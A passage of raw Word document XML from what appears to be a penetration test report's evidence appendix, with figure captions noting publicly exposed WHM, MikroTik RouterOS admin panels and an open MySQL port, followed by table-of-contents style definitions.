                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure E.1: WHM root admin panel accessible from public internet — no authentication bypass required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="2633487"/>
            <wp:docPr id="48" name="Picture 48"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig418_mikrotik_browser.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="2633487"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure E.2: MikroTik RouterOS admin panel accessible from public internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="889412"/>
            <wp:docPr id="49" name="Picture 49"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig419_mysql_connect.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="889412"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure E.3: MySQL port 3306 accepting remote connections from external host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Browser-based evidence of exposed administrative interfaces confirmed accessible from any internet connection during the engagement, supporting findings N-001, N-002, and N-014.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
      <w:footerReference w:type="default" r:id="rId51"/>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240" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="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360" w:lineRule="auto"/>
      <w:ind w:firstLine="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60" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="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pPr>
      <w:spacing w:before="0" w:after="60"/>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="60"/>
      <w:ind w:left="284" w:firstLine="0"/>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="60"/>
      <w:ind w:left="851" w:firstLine="0"/>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs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footer" Target="footer1.xml"/><Relationship Id="rId5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